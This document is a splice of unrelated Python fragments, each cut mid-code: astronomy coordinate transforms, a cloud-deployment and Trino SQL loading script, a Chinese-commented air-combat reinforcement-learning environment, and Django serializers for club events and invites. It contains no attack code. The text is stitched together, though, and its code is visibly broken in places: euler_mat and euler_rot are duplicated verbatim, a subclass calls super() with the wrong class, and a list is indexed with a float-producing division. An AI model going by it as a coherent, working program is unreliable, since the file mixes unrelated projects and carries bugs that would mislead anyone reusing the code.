while True:
if from_sys == to_sys: break
elif from_sys == "bore":
coords[:] = bore2tele(coords, bore)
from_sys = "tele"
elif from_sys == "tele" and to_sys in ["bore"]:
coords[:] = tele2bore(coords, bore)
from_sys = "bore"
elif from_sys == "tele":
coords[:] = tele2hor(coords, site, copy=False)
from_sys = "altaz"
elif from_sys == "altaz" and to_sys in ["tele","bore"]:
coords[:] = hor2tele(coords, site, copy=False)
from_sys = "tele"
elif from_sys == "altaz":
coords[:] = hor2cel(coords, time, site, copy=False)
from_sys = "icrs"
elif from_sys == "icrs" and to_sys in ["altaz","tele","bore"]:
coords[:] = cel2hor(coords, time, site, copy=False)
from_sys = "altaz"
else:
to_sys_astropy = nohor(to_sys)
coords[:] = transform_astropy(from_sys, to_sys_astropy, coords)
from_sys = to_sys_astropy
if to_ref is not None: coords[:] = recenter(coords, to_ref[0], restore=to_ref[1])
return coords.reshape(oshape)
def transform_astropy(from_sys, to_sys, coords):
"""As transform, but only handles the systems supported by astropy."""
from_sys, to_sys = getsys(from_sys), getsys(to_sys)
if from_sys == to_sys: return coords
unit = u.radian
coords = c.SkyCoord(coords[0], coords[1], frame=from_sys, unit=unit)
coords = coords.transform_to(to_sys)
names = coord_names[to_sys]
return np.asarray([
getattr(getattr(coords, names[0]),unit.name),
getattr(getattr(coords, names[1]),unit.name)])
def transform_euler(euler, coords, pol=None, mag=None):
"""Like transform, but for a set of zyz euler angles instead"""
def rotfun(coords): return euler_rot(euler, coords)
fields = []
if pol: fields.append("ang")
if mag: fields.append("mag")
if pol is None and mag is None:
if len(coords) > 2: fields.append("ang")
if len(coords) > 3: fields.append("mag")
meta = transform_meta(rotfun, coords[:2], fields=fields)
res = np.zeros((2+len(fields),) + meta.ocoord.shape[1:])
res[:2] = meta.ocoord
off = 2
for i, f in enumerate(fields):
if f == "ang":
if len(coords) > 2: res[off+i] = coords[2] + meta.ang
else: res[off+i] = meta.ang
elif f == "mag":
if len(coords) > 3: res[off+i] = coords[3] * meta.mag
else: res[off+i] = meta.mag
return res
def hor2cel(coord, time, site, copy=True):
from enlib.coordinates import pyfsla
from enlib.coordinates import iers
coord = np.array(coord, copy=copy)
trepr = time[len(time)/2]
info = iers.lookup(trepr)
ao = pyfsla.sla_aoppa(trepr, info.dUT, site.lon*utils.degree, site.lat*utils.degree, site.alt,
info.pmx*utils.arcsec, info.pmy*utils.arcsec, site.T, site.P, site.hum,
299792.458/site.freq, site.lapse)
am = pyfsla.sla_mappa(2000.0, trepr)
# This involves a transpose operation, which is not optimal
pyfsla.aomulti(time, coord.T, ao, am)
return coord
def cel2hor(coord, time, site, copy=True):
from enlib.coordinates import pyfsla
from enlib.coordinates import iers
# This is very slow for objects near the horizon!
coord = np.array(coord, copy=copy)
trepr = time[len(time)/2]
info = iers.lookup(trepr)
ao = pyfsla.sla_aoppa(trepr, info.dUT, site.lon*utils.degree, site.lat*utils.degree, site.alt,
info.pmx*utils.arcsec, info.pmy*utils.arcsec, site.T, site.P, site.hum,
299792.458/site.freq, site.lapse)
am = pyfsla.sla_mappa(2000.0, trepr)
# This involves a transpose operation, which is not optimal
pyfsla.oamulti(time, coord.T, ao, am)
return coord
def tele2hor(coord, site, copy=True):
coord = np.array(coord, copy=copy)
coord = euler_rot([site.base_az*utils.degree, site.base_tilt*utils.degree, -site.base_az*utils.degree], coord)
return coord
def hor2tele(coord, site, copy=True):
coord = np.array(coord, copy=copy)
coord = euler_rot([site.base_az*utils.degree, -site.base_tilt*utils.degree, -site.base_az*utils.degree], coord)
return coord
def tele2bore(coord, bore, copy=True):
"""Transforms coordinates [{ra,dec},...] to boresight-relative coordinates given by the boresight pointing
[{ra,dec},...] with the same shape as coords. After the rotation, the boresight will be at the zenith;
things above the boresight will be at 'ra'=180 and things below will be 'ra'=0."""
coord = np.array(coord, copy=copy)
return recenter(coord, bore)
def bore2tele(coord, bore, copy=True):
"""Transforms coordinates [{ra,dec},...] from boresight-relative coordinates given by the boresight pointing
[{ra,dec},...] with the same shape as coords. After the rotation, the coordinates will be in telescope
coordinates, which are similar to horizontal coordinates."""
coord = np.array(coord, copy=copy)
return decenter(coord, bore)
def euler_mat(euler_angles, kind="zyz"):
"""Defines the rotation matrix M for a ABC euler rotation,
such that M = A(alpha)B(beta)C(gamma), where euler_angles =
[alpha,beta,gamma]. The default kind is ABC=ZYZ."""
alpha, beta, gamma = euler_angles
R1 = utils.rotmatrix(gamma, kind[2])
R2 = utils.rotmatrix(beta, kind[1])
R3 = utils.rotmatrix(alpha, kind[0])
return np.einsum("...ij,...jk->...ik",np.einsum("...ij,...jk->...ik",R3,R2),R1)
def euler_rot(euler_angles, coords, kind="zyz"):
coords = np.asarray(coords)
co = coords.reshape(2,-1)
M = euler_mat(euler_angles, kind)
rect = utils.ang2rect(co, False)
rect = np.einsum("...ij,j...->i...",M,rect)
co = utils.rect2ang(rect, False)
return co.reshape(coords.shape)
def euler_mat(euler_angles, kind="zyz"):
"""Defines the rotation matrix M for a ABC euler rotation,
such that M = A(alpha)B(beta)C(gamma), where euler_angles =
[alpha,beta,gamma]. The default kind is ABC=ZYZ."""
alpha, beta, gamma = euler_angles
R1 = utils.rotmatrix(gamma, kind[2])
R2 = utils.rotmatrix(beta, kind[1])
R3 = utils.rotmatrix(alpha, kind[0])
return np.einsum("...ij,...jk->...ik",np.einsum("...ij,...jk->...ik",R3,R2),R1)
def euler_rot(euler_angles, coords, kind="zyz"):
coords = np.asarray(coords)
co = coords.reshape(2,-1)
M = euler_mat(euler_angles, kind)
rect = utils.ang2rect(co, False)
rect = np.einsum("...ij,j...->i...",M,rect)
co = utils.rect2ang(rect, False)
return co.reshape(coords.shape)
def recenter(angs, center, restore=False):
"""Recenter coordinates "angs" (as ra,dec) on the location given by "center",
such that center | |
replicas
announce("Waiting for deployments to be available")
spinWait(lambda: waitUntilDeploymentsAvail(4, namespace))
# now the load balancers need to be running with their IPs assigned
announce("Waiting for load-balancers to launch")
spinWait(lambda: waitUntilLoadBalancersUp(services, namespace))
#
# Get the DNS name of the load balancers we've created
#
lbs = getLoadBalancers(services, namespace)
# we should have a load balancer for every service we'll forward
assert len(lbs) == len(services)
for svc in services:
assert svc in lbs
tuns.append(Tunnel(svc, ipaddress.IPv4Address(bastionIp),
getLclPort(svc), lbs[svc], getRmtPort(svc)))
# make sure the load balancers are actually responding
announce("Waiting for load-balancers to start responding")
spinWait(lambda: waitUntilLoadBalancersUp(services, namespace,
checkConnectivity = True))
# TODO AWS Doesn't support specification of a static IP for the ELB, so we
# cannot set up Route53 in Terraform to point to a static IP. Instead we
# need to use the aws cli to hand-modify the Route53 entries to create
# aliases to our load-balancer DNS names.
if target == "aws":
assert route53ZoneId
setRoute53Cname(lbs, route53ZoneId)
return tuns
class ApiError(Exception):
pass
def retryHttp(f, maxretries: int, descr: str) -> requests.Response:
retries = 0
stime = 1
while True:
try:
r = f()
if r.status_code == 503:
time.sleep(0.5)
continue
# All good -- we exit here.
if retries > 0:
print(f"Succeeded on \"{descr}\" after {retries} retries")
return r
except requests.exceptions.ConnectionError as e:
print(f"Failed to connect: \"{descr}\"; retries={retries}; "
f"sleep={stime}")
if retries > maxretries:
print(f"{maxretries} retries exceeded!")
raise
time.sleep(stime)
retries += 1
stime <<= 1
def sendSql(command: str, verbose = False) -> list:
httpmaxretries = 10
if verbose: announceSqlStart(command)
url = getStarburstUrl() + "/v1/statement"
hdr = { "X-Trino-User": trinouser }
authtype = None
if tlsenabled():
authtype = requests.auth.HTTPBasicAuth(trinouser, trinopass)
f = lambda: requests.post(url, headers = hdr, auth = authtype, data =
command, verify = secrets["wildcert"]["f"] if tlsinternal else
None)
r = retryHttp(f, maxretries = httpmaxretries, descr = f"POST [{command}]")
data = []
while True:
r.raise_for_status()
assert r.status_code == 200
j = r.json()
if "data" in j:
data += j["data"]
if "nextUri" not in j:
if "error" in j:
raise ApiError("Error executing SQL '{s}': error {e}".format(s
= command, e = str(j["error"])))
if verbose: announceSqlEnd(command)
return data # the only way out is success, or an exception
if tlsinternal:
f = lambda: requests.get(j["nextUri"], headers = hdr, verify =
secrets["wildcert"]["f"])
else:
f = lambda: requests.get(j["nextUri"], headers = hdr, verify =
None)
r = retryHttp(f, maxretries = httpmaxretries,
descr = f"GET nextUri [{command}]")
def dontLoadCat(cat: str) -> bool:
avoidcat = {tpchcat, syscat, sfdccat}
# Synapse serverless pools are read-only
if target == "az":
avoidcat.add(synapseslcat)
return cat in avoidcat or cat.startswith("sg_")
def getTpchTableSize(scale: str, table: str) -> int:
global tpchtables
assert table in tpchtables
assert scale in tpchbuckets
b = tpchbuckets[scale]["tsizes"]
assert table in b
return b[table]
class CommandGroup:
def __init__(self):
self.cv = threading.Condition()
self.workToDo = 0
self.workDone = 0
# Methods modifying state protected by cv (condition variable) lock
# Must be called with lock held--and this is only called by wait_for on the
# condition variable, which always guarantees the lock is held
def allCommandsDone(self) -> bool:
assert self.workDone <= self.workToDo
return self.workDone == self.workToDo
def ratioDone(self) -> float:
with self.cv:
assert self.workDone <= self.workToDo, \
f"{self.workDone} should be <= {self.workToDo}"
# It's possible that no commands were processed, in which case
# avoid doing a division-by-zero by saying we're finished.
ratio = float(self.workDone) / self.workToDo \
if self.workToDo > 0 else 1.0
return ratio
def checkCopiedTable(self, dstCatalog: str, dstSchema: str, dstTable: str,
rows: int) -> None:
dest = "{dc}.{ds}.{dt}".format(dc = dstCatalog, ds = dstSchema,
dt = dstTable)
try:
copiedRows = sendSql(f"select count(*) from {dest}")[0][0]
if copiedRows < rows:
print(f"Tried to process {rows}, only did {copiedRows}")
except ApiError as e:
print(f"Couldn't read rows from {dest}")
def processSqlCommand(self, cmd: str, callback = None) -> None:
x = sendSql(cmd)
if callback:
callback(x)
with self.cv:
self.workDone += 1
self.cv.notify_all()
def addSqlCommand(self, cmd, callback = None) -> None:
t = threading.Thread(target = self.processSqlCommand,
args = (cmd, callback, ))
with self.cv:
self.workToDo += 1
t.start()
def processSqlTableCommand(self, srcTable: str, dstCatalog: str,
dstSchema: str, rows: int, cmd: str = None,
check: bool = False) -> None:
if cmd:
sendSql(cmd)
if check:
self.checkCopiedTable(dstCatalog, dstSchema, srcTable, rows)
# We get here whether it works or not
with self.cv:
self.workDone += rows
self.cv.notify_all()
def addSqlTableCommand(self, tpchSchema: str, srcTable: str,
dstCatalog: str, dstSchema: str, cmd: str = None,
check: bool = False) -> None:
rows = getTpchTableSize(tpchSchema, srcTable)
t = threading.Thread(target = self.processSqlTableCommand,
args = (srcTable, dstCatalog, dstSchema, rows, cmd, check, ))
with self.cv:
self.workToDo += rows
t.start()
def processBqCommand(self, srcCatalog: str, srcSchema: str, srcTable: str,
dstSchema: str, rows: int, check: bool = False) -> None:
assert srcCatalog == hivecat
# Get the list of files to be loaded
storage_client = storage.Client()
blobs = storage_client.list_blobs(bucket,
prefix=f"{srcCatalog}/{srcSchema}/{srcTable}/")
paths = [f"gs://{bucket}/{b.name}" for b in blobs if b.name[-1] != '/']
assert len(paths) > 0
# Construct a BigQuery client object.
client = bigquery.Client()
# TODO this could break if someone changes to Parquet format
job_config = bigquery.LoadJobConfig(write_disposition =
bigquery.WriteDisposition.WRITE_EMPTY, source_format =
bigquery.SourceFormat.ORC,)
table_id = "{dp}.{ds}.{st}".format(dp = gcpproject, ds = dstSchema,
st = srcTable)
try:
load_job = client.load_table_from_uri(paths, table_id,
job_config=job_config) # Make an API request.
load_job.result() # Waits for the job to complete.
except google.api_core.exceptions.Conflict as e:
# This exception indicates that there was already a table. That's
# fine and we can completely ignore that message.
pass
# This check should pass even if we got a write conflict
destination_table = client.get_table(table_id)
assert destination_table.num_rows == rows
if check:
self.checkCopiedTable(bqcat, dstSchema, srcTable, rows)
# We get here whether it works or not
with self.cv:
self.workDone += rows
self.cv.notify_all()
def addBqCommand(self, tpchSchema: str, srcCatalog: str, srcSchema: str,
srcTable: str, dstSchema: str, check: bool = False) -> None:
rows = getTpchTableSize(tpchSchema, srcTable)
t = threading.Thread(target = self.processBqCommand,
args = (srcCatalog, srcSchema, srcTable, dstSchema, rows,
check,))
with self.cv:
self.workToDo += rows
t.start()
def waitOnAllCopies(self) -> None:
with self.cv:
self.cv.wait_for(self.allCommandsDone)
def preloadTpchTableSizes(scaleSets: set[str]) -> None:
# First, get the list of table names
#
global tpchtables, tpchbuckets
assert len(scaleSets) > 0
scale = next(iter(scaleSets))
if not tpchtables:
tabs = sendSql(f"show tables in {tpchcat}.{scale}")
tpchtables = {t[0] for t in tabs}
announce("Getting tpch table sizes for scale sets -> "
"{}".format(", ".join(scaleSets)))
# Next, fill in the sizes of each of the tables for each scale
#
cg = CommandGroup()
for scale in scaleSets:
assert scale in tpchbuckets
b = tpchbuckets[scale]["tsizes"]
lock = threading.Lock()
for table in tpchtables:
if table not in b:
# callback will make a closure with b[table], storing the
# results there that come back from the SQL call. We have to
# use an odd construction here because Python performs
# late-binding with closures; to force early binding we'll use
# a function-factory. https://tinyurl.com/4x3t2wux
def make_cbs(b, scale, table):
def cbs(tablesize):
with lock:
b[table] = tablesize[0][0]
return cbs
cg.addSqlCommand("select count(*) from "
f"{tpchcat}.{scale}.{table}",
callback = make_cbs(b, scale, table))
spinWait(cg.ratioDone)
cg.waitOnAllCopies() # Should be a no-op
def createSchemas(dstCatalogs: list, dstSchema: str, hiveTarget: str) -> None:
cg = CommandGroup()
announce("creating schemas in {}".format(", ".join(dstCatalogs)))
for dstCatalog in dstCatalogs:
clause = ""
if dstCatalog in lakecats:
clause = " with (location = '{l}/{c}/{s}')".format(l =
hiveTarget, c = dstCatalog, s = dstSchema)
cg.addSqlCommand("create schema if not exists "
f"{dstCatalog}.{dstSchema}{clause}")
# Progress meter on all transfers across all destination schemas
spinWait(cg.ratioDone)
cg.waitOnAllCopies() # Should be a no-op
def copySchemaTables(srcCatalog: str, srcSchema: str, dstCatalogs: list[str],
hiveTarget: str, partition: bool, numbuckets: int):
# Never write to the source, or to unwritable catalogs
dstCatalogs = [c for c in dstCatalogs if not dontLoadCat(c)
or c == srcCatalog]
# If there are no catalogs to process, then just return
if len(dstCatalogs) < 1:
return
# First, create all the schemas that we need
createSchemas(dstCatalogs, dbschema, hiveTarget)
tpchschema = srcSchema if srcCatalog != hivecat else tpchbigschema
cg = CommandGroup()
announce("creating tables in {}".format(", ".join(dstCatalogs)))
for dstCatalog in dstCatalogs:
# Now copy the data over from our | |
#!usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import math
import time
import sys
sys.path.append('../..')
from envs.airCombateEnv.customization import init_posture
from envs.airCombateEnv.customization import REGISTRY_STATE as registry_state
from argument.argManage import args
from envs.unit import REGISTRY as registry_unit
if sys.version_info.major == 2:
import Tkinter as tk
else:
import tkinter as tk
np.set_printoptions(suppress=True)
class Env(object):
def __init__(self):
'''
基类构造函数:
还至少需要设置 state_space, action_space, state_dim, action_dim
包含 单位实例列表 red_unit_list, blue_unit_list
'''
# 地图设置
self.AREA = args.map_area # 地图范围
# 可视化显示参数
self.SCALE = args.map_scale # 比例尺
self.SCOPE = self.AREA * self.SCALE # Tkinter显示范围
# 训练参数
self.t = args.map_t # 时间间隔(步长,秒)
self.td = self.t / args.map_t_n # 每个步长计算次数
self.Sum_Oil = 100 # 油量,即每个episode的最大step数量
## 飞机列表
self.red_unit_list = []
self.blue_unit_list = []
def _seed(self, seed):
'''
设置随机种子
'''
np.random.seed(seed)
def reset(self):
'''
环境初始化
输出:
当前状态(所有飞机的当前状态)
'''
raise NotImplementedError
def step(self, *action):
'''
输入:
动作(环境内所有飞机的动作)
输出:
<下一状态,奖励值,done>,当前状态可以省略
待扩展:
局部可观察obs,额外状态信息(全局状态)state
'''
raise NotImplementedError
def _get_reward(self, *args):
'''
根据当前飞机信息,给出奖励函数。
最好是输入设置为当前环境能够给出的所有信息,返回的是奖励值。
这样当使用时可以不用管中间的逻辑实现,只需看输入、输出;
当想创建新的奖励函数模型时,只需要根据环境所能提供的信息,来实现此函数内逻辑的实现。
'''
raise NotImplementedError
def render(self):
'''
环境的可视化显示
'''
raise NotImplementedError
def close(self):
'''
可视化关闭
'''
raise NotImplementedError
# Partially Observable Env for Multi-Agent
# 部分可观察的多智能体环境使用
def get_state(self):
raise NotImplementedError
def get_state_shape(self):
raise NotImplementedError
def get_agent_obs(self, agent_id):
raise NotImplementedError
def get_agent_obs_shape(self):
raise NotImplementedError
def _get_avail_actions(self):
raise NotImplementedError
def _get_agent_avail_actions(self, agent_id):
raise NotImplementedError
class AirCombatEnv(Env):
def __init__(self):
super(AirCombatEnv, self).__init__()
# 飞机参数
self.red = registry_unit["default"](None, 200, 80) # 红方飞机
self.blue = registry_unit["default"](None, 200, 80) # 蓝方飞机
# reward判断指标
self.AA_range = 60 # 视界角范围
self.ATA_range = 30 # 天线拂擦角范围
self.Dis_max = 500 # 距离最大值
self.Dis_min = 100 # 距离最小值
self.adv_count = 0 # 持续建立优势的次数
# 初始想定模式:0随机,1进攻,2防御,3同向,4中立
self.init_scen = args.init_scen
# 强化学习动作接口
self.action_space = ['l', 's', 'r'] # 向左滚转、维持滚转、向右滚转
self.n_actions = len(self.action_space)
self.action_dim = self.n_actions
self.state_dim = len(registry_state[args.state_setting](self.red, self.blue, self.adv_count))
# reward条件
self.success = 0
def reset_selfPlay(self):
# 初始化参数
self.reward_b = 0
self.reward_r = 0
self.done = False
self.success = 0
self.acts = [[], []]
self.advs = []
self.ATA_b = self.AA_b = 100
self.ATA_r = self.AA_r = 100
self.adv_count = 0
# 初始化红蓝方飞机
init_posture(self.init_scen, self.red, self.blue, args.random_r, args.random_b)
self.red.oil = args.Sum_Oil
self.blue.oil = args.Sum_Oil
# print(self.red.ac_pos)
# print(self.blue.ac_pos)
# 计算ATA,AA
self.ATA_b, self.AA_b = self._getAngle(self.red.ac_pos, self.blue.ac_pos, self.red.ac_heading,
self.blue.ac_heading)
self.ATA_r, self.AA_r = self._getAngle(self.blue.ac_pos, self.red.ac_pos, self.blue.ac_heading,
self.red.ac_heading)
# 计算距离
dis = self._get_dis(self.red.ac_pos, self.blue.ac_pos)
# 计算优势
self.adv_count = self._calculate_Advantages(self.adv_count, dis, self.AA_r, self.ATA_r, self.AA_b, self.ATA_b)
# reward shaping
RA_b = 1 - ((1 - math.fabs(self.ATA_b) / 180) + (1 - math.fabs(self.AA_b) / 180))
RA_r = 1 - ((1 - math.fabs(self.ATA_r) / 180) + (1 - math.fabs(self.AA_r) / 180))
RD = math.exp(-(math.fabs(dis - ((self.Dis_max + self.Dis_min) / 2)) / 180 * 0.1))
Rbl_b = RA_b * RD
Rbl_r = RA_r * RD
self.fai_b = -0.01 * Rbl_b
self.fai_r = -0.01 * Rbl_r
# 返回红蓝飞机状态
s_b = registry_state[args.state_setting](self.red, self.blue, self.adv_count)
s_r = registry_state[args.state_setting](self.blue, self.red, self.adv_count)
return s_b, s_r
def step_selfPlay(self, action_b, action_r):
# 记录动作
self.acts[0].append(action_b)
self.acts[1].append(action_r)
# 执行动作
self.blue.move(action_b)
self.red.move(action_r)
# print(self.red.ac_pos)
# print(self.blue.ac_pos)
# 返回红蓝飞机状态
s_b = registry_state[args.state_setting](self.red, self.blue, self.adv_count)
s_r = registry_state[args.state_setting](self.blue, self.red, self.adv_count)
# 计算reward
self.reward_b, self.reward_r, self.done, self.adv_count = self._get_reward(self.red.ac_pos, self.red.ac_heading,
self.blue.ac_pos,
self.blue.ac_heading,
self.adv_count)
# print(s_b, s_r, self.reward_b, self.reward_r, self.done)
return s_b, s_r, self.reward_b, self.reward_r, self.done
def _getAngle(self, agent_A_pos, agent_B_pos, agent_A_heading, agent_B_heading):
"""
param:
agent_A_pos: 飞机A的坐标
agent_B_pos: 飞机B的坐标
agent_A_heading: 飞机A的朝向角
agent_B_heading: 飞机B的朝向角
return:
B的AA和ATA角
主要逻辑:
分别输入两架飞机的位置坐标 和 朝向角,
计算 第二架飞机B的 ATA 和 AA 角(见doc/pic/envs_airCombateEnv_001.png)
"""
theta_br = 180 * math.atan2((agent_A_pos[1] - agent_B_pos[1]), (agent_A_pos[0] - agent_B_pos[0])) / math.pi
theta_rb = 180 * math.atan2((agent_B_pos[1] - agent_A_pos[1]), (agent_B_pos[0] - agent_A_pos[0])) / math.pi
if theta_br < 0:
theta_br = 360 + theta_br
if theta_rb < 0:
theta_rb = 360 + theta_rb
ATA = agent_B_heading - theta_br
AA = 180 + agent_A_heading - theta_rb
if ATA > 180:
ATA = 360 - ATA
elif ATA < -180:
ATA = 360 + ATA
if AA > 180:
AA = 360 - AA
elif AA < -180:
AA = 360 + AA
return ATA, AA
def _get_reward(self, ac_pos_r, ac_heading_r, ac_pos_b, ac_heading_b, adv_count):
dis = math.sqrt((ac_pos_r[0] - ac_pos_b[0]) * (ac_pos_r[0] - ac_pos_b[0])
+ (ac_pos_r[1] - ac_pos_b[1]) * (ac_pos_r[1] - ac_pos_b[1]))
# 计算ATA和AA
self.ATA_b, self.AA_b = self._getAngle(ac_pos_r, ac_pos_b, ac_heading_r, ac_heading_b)
self.ATA_r, self.AA_r = self._getAngle(ac_pos_b, ac_pos_r, ac_heading_b, ac_heading_r)
# 计算优势
adv_count = self._calculate_Advantages(adv_count, dis, self.AA_r, self.ATA_r, self.AA_b, self.ATA_b)
# reward shaping
RA_b = 1 - ((1 - math.fabs(self.ATA_b) / 180) + (1 - math.fabs(self.AA_b) / 180))
RA_r = 1 - ((1 - math.fabs(self.ATA_r) / 180) + (1 - math.fabs(self.AA_r) / 180))
RD = math.exp(-(math.fabs(dis - ((self.Dis_max + self.Dis_min) / 2)) / 180 * 0.1))
Rbl_b = RA_b * RD
Rbl_r = RA_r * RD
self.old_fai_b = self.fai_b
self.old_fai_r = self.fai_r
self.fai_b = -0.01 * Rbl_b
self.fai_r = -0.01 * Rbl_r
# 计算reward和终止条件
# print(adv_count)
if adv_count >= 9:
done = True
self.success = 1
reward_b = 2.0
reward_r = -2.0
# print("bsuccess")
elif adv_count <= -9:
done = True
self.success = -1
reward_b = -2.0
reward_r = 2.0
# print("rsuccess")
elif self.red.oil <= 0 and self.blue.oil <= 0:
done = True
self.success = 0
reward_b = -1.0
reward_r = -1.0
elif (ac_pos_b[0] > args.map_area) or ((0 - ac_pos_b[0]) > args.map_area) or \
(ac_pos_b[1] > args.map_area) or ((0 - ac_pos_b[1]) > args.map_area):
done = True
self.success = 0
reward_b = -1.0
reward_r = (self.fai_r - self.old_fai_r) - 0.001
elif (ac_pos_r[0] > args.map_area) or ((0 - ac_pos_r[0]) > args.map_area) or \
(ac_pos_r[1] > args.map_area) or ((0 - ac_pos_r[1]) > args.map_area):
done = True
self.success = 0
reward_b = (self.fai_b - self.old_fai_b) - 0.001
reward_r = -1.0
else:
done = False
reward_b = (self.fai_b - self.old_fai_b) - 0.001
reward_r = (self.fai_r - self.old_fai_r) - 0.001
return reward_b, reward_r, done, adv_count
def _calculate_Advantages(self, adv_count, dis, AA_r, ATA_r, AA_b, ATA_b):
"""
计算红蓝方优势次数
:param adv_count:优势次数:-1为红方优势态势,1为蓝方优势态势
:param dis:距离
:param AA_r:红方AA角
:param ATA_r:红方ATA角
:param AA_b:蓝方AA角
:param ATA_b:蓝方ATA角
:return:优势次数
"""
# 计算优势
if (dis < self.Dis_max) and (dis > self.Dis_min) \
and (abs(AA_b) < self.AA_range) and (abs(ATA_b) < self.ATA_range):
if adv_count >= 0: # 如果之前蓝方已经是优势态势,优势累加
adv_count += 1
else: # 如果之前是红方优势态势,优势交替
adv_count = 1
elif (dis < self.Dis_max) and (dis > self.Dis_min) \
and (abs(AA_r) < self.AA_range) and (abs(ATA_r) < self.ATA_range):
if adv_count <= 0:
adv_count -= 1
else:
adv_count = -1
else:
adv_count = 0
self.advs.append(adv_count)
return adv_count
def _get_dis(self, pos_a, pos_b):
"""
计算坐标A和坐标B的距离
:param pos_a: 坐标A
:param pos_b: 坐标B
:return: 坐标A和坐标B的距离
"""
dis = math.sqrt((pos_a[0] - pos_b[0]) * (pos_a[0] - pos_b[0])
+ (pos_a[1] - pos_b[1]) * (pos_a[1] - pos_b[1]))
return dis
def creat_ALG(self):
self.Tk = tk.Tk()
self.Tk.title('1V1')
self.Tk.canvas = tk.Canvas(self.Tk, bg='white',
height=args.map_area * args.map_scale * 2,
width=args.map_area * args.map_scale * 2)
self.Tk.canvas.pack()
def render(self):
# 刷新红方飞机
self.r_show = self.xyz2abc(self.red.ac_pos)
self.r = self.Tk.canvas.create_oval(
self.r_show[0] - 1, self.r_show[1] - 1,
self.r_show[0] + 1, self.r_show[1] + 1,
fill='red')
# 刷新蓝方飞机
self.b_show = self.xyz2abc(self.blue.ac_pos)
self.b = self.Tk.canvas.create_oval(
self.b_show[0] - 1, self.b_show[1] - 1,
self.b_show[0] + 1, self.b_show[1] + 1,
fill='blue')
self.Tk.update()
time.sleep(0.05)
if self.done:
time.sleep(0.1)
self.Tk.destroy()
def close(self):
self.Tk.destroy()
def xyz2abc(self, pos):
pos_show = np.array([0, 0])
pos_show[0] = pos[0] * args.map_scale + args.map_area * args.map_scale
pos_show[1] = args.map_area * args.map_scale - pos[1] * args.map_scale
return pos_show
class AirCombatEnvMultiUnit(Env):
def __init__(self):
super(AirCombatEnv, self).__init__()
# 初始化双方飞机
id_number = 0
for name in args.red_unit_type_list: # args.red_unit_type_list为飞机类型名字列表
red_unit = registry_unit[name](id_number)
self.red_unit_list.append(red_unit)
id_number = id_number + 1
id_number = 0
for name in args.blue_unit_type_list:
blue_unit = registry_unit[name](id_number)
self.blue_unit_list.append(blue_unit)
id_number = id_number + 1
self.n_red_unit = len(args.red_unit_type_list)
self.n_blue_unit = len(args.blue_unit_type_list)
# 强化学习动作接口
# 【方案一】 直接使用联结动作空间,即 [a1, a2, ..., an, a1, a2, ..., an, ...]
# 注意:如果红蓝双方飞机数量不一致,则分别定义
self.single_action_space = ['l', 's', 'r'] # 向左滚转、维持滚转、向右滚转
self.action_space = self.single_action_space * self.n_red_unit
# # 【方案二】 使用decentralized policy,即动作空间只包含单独一个agent的
# self.action_space = ['l', 's', 'r']
self.action_dim = self.n_actions = len(self.action_space)
self.state_dim = 5 # 需要定义
# todo:reward判断指标
def reset_selfPlay(self):
self.done = False
self.success = 0
self.acts = [[], []] # todo-levin: 只保存一个agent的acts,还是两个acgent的acts?
# 1°初始化红蓝红方飞机
# todo:
# 【方案一】:
# 按照实际阵型构建初始化阵型函数,初始化中心飞机的位置,确定每个飞机的位置
# 【方案二】:
# 随机初始化一个区域,在区域内随机初始各飞机的位置
# 遍历列表初始化飞机的状态:滚转角、油量等
# 2°得到初始状态
for unit in self.red_unit_list:
# 分别得到红、蓝双方的联结状态空间
pass
for unit in self.blue_unit_list:
pass
# levin - [done]: add both actions
def step_selfPlay(self, action_blue_list, action_red_list):
'''
Parms:
action_b: list or tuple
action_r: list or tuple
'''
# | |
event that includes basic associated club information.
"""
club = serializers.SlugRelatedField(
queryset=Club.objects.all(), required=False, slug_field="code"
)
club_name = serializers.SerializerMethodField()
badges = BadgeSerializer(source="club.badges", many=True, read_only=True)
pinned = serializers.BooleanField(read_only=True)
def get_club_name(self, obj):
if obj.club is None:
return None
return obj.club.name
class Meta:
model = Event
fields = ClubEventSerializer.Meta.fields + [
"club",
"club_name",
"badges",
"pinned",
]
class EventWriteSerializer(EventSerializer):
"""
A serializer for an event that is used when creating/editing the event.
Enables URL checking for the url field.
"""
url = serializers.CharField(
max_length=2048, required=False, allow_blank=True, allow_null=True
)
def update(self, instance, validated_data):
"""
Enforce only changing the meeting link to Zoom links for activities fair events.
"""
if instance.type == Event.FAIR and "url" in validated_data:
old_url = instance.url or ""
new_url = validated_data.get("url", "")
# if the two urls are not equal, perform additional checks
if old_url != new_url:
parsed_url = urlparse(new_url)
if ".zoom.us" not in parsed_url.netloc and new_url:
raise serializers.ValidationError(
{
"url": "You should use a Zoom link for the meeting url! "
"You can use the Zoom setup page to do this for you."
}
)
return super().update(instance, validated_data)
class FavouriteEventSerializer(EventSerializer):
pass
class ClubBoothSerializer(serializers.ModelSerializer):
club = serializers.SlugRelatedField(queryset=Club.objects.all(), slug_field="code")
class Meta:
model = ClubFairBooth
fields = (
"name",
"subtitle",
"club",
"image_url",
"lat",
"long",
"start_time",
"end_time",
)
class MembershipInviteSerializer(serializers.ModelSerializer):
id = serializers.CharField(max_length=8, read_only=True)
email = serializers.EmailField(read_only=True)
token = serializers.CharField(max_length=128, write_only=True)
name = serializers.CharField(source="club.name", read_only=True)
public = serializers.BooleanField(write_only=True, required=False)
def create(self, validated_data):
validated_data.pop("public", None)
return super().create(validated_data)
def update(self, instance, validated_data):
user = self.context["request"].user
public = validated_data.pop("public", False)
if not self.validated_data.get("token") == self.instance.token:
raise serializers.ValidationError("Missing or invalid token in request!")
# if there is an owner and the invite is for a upenn email,
# do strict username checking
if (
self.instance.email.endswith((".upenn.edu", "@upenn.edu"))
and self.instance.club.membership_set.count() > 0
):
# penn medicine emails have multiple aliases
if not self.instance.email.endswith("@pennmedicine.upenn.edu"):
invite_username = self.instance.email.rsplit("@", 1)[0]
if not (
invite_username.lower() == user.username.lower()
or self.instance.email == user.email
):
raise serializers.ValidationError(
f"This invitation was meant for {invite_username}, "
f"but you are logged in as {user.username}!"
)
# claim the invite and set the membership public status
obj = instance.claim(user)
obj.public = public
obj.save()
# if a membership request exists, delete it
MembershipRequest.objects.filter(person=user, club=self.instance.club).delete()
return instance
class Meta:
model = MembershipInvite
fields = [
"email",
"id",
"name",
"public",
"role",
"title",
"token",
"updated_at",
]
class ExternalMemberListSerializer(serializers.ModelSerializer):
"""
This serializer is used for listing non-sensitive data
accessible to the public via CORS
"""
name = serializers.CharField(source="person.username")
image = serializers.SerializerMethodField("get_image")
def get_image(self, obj):
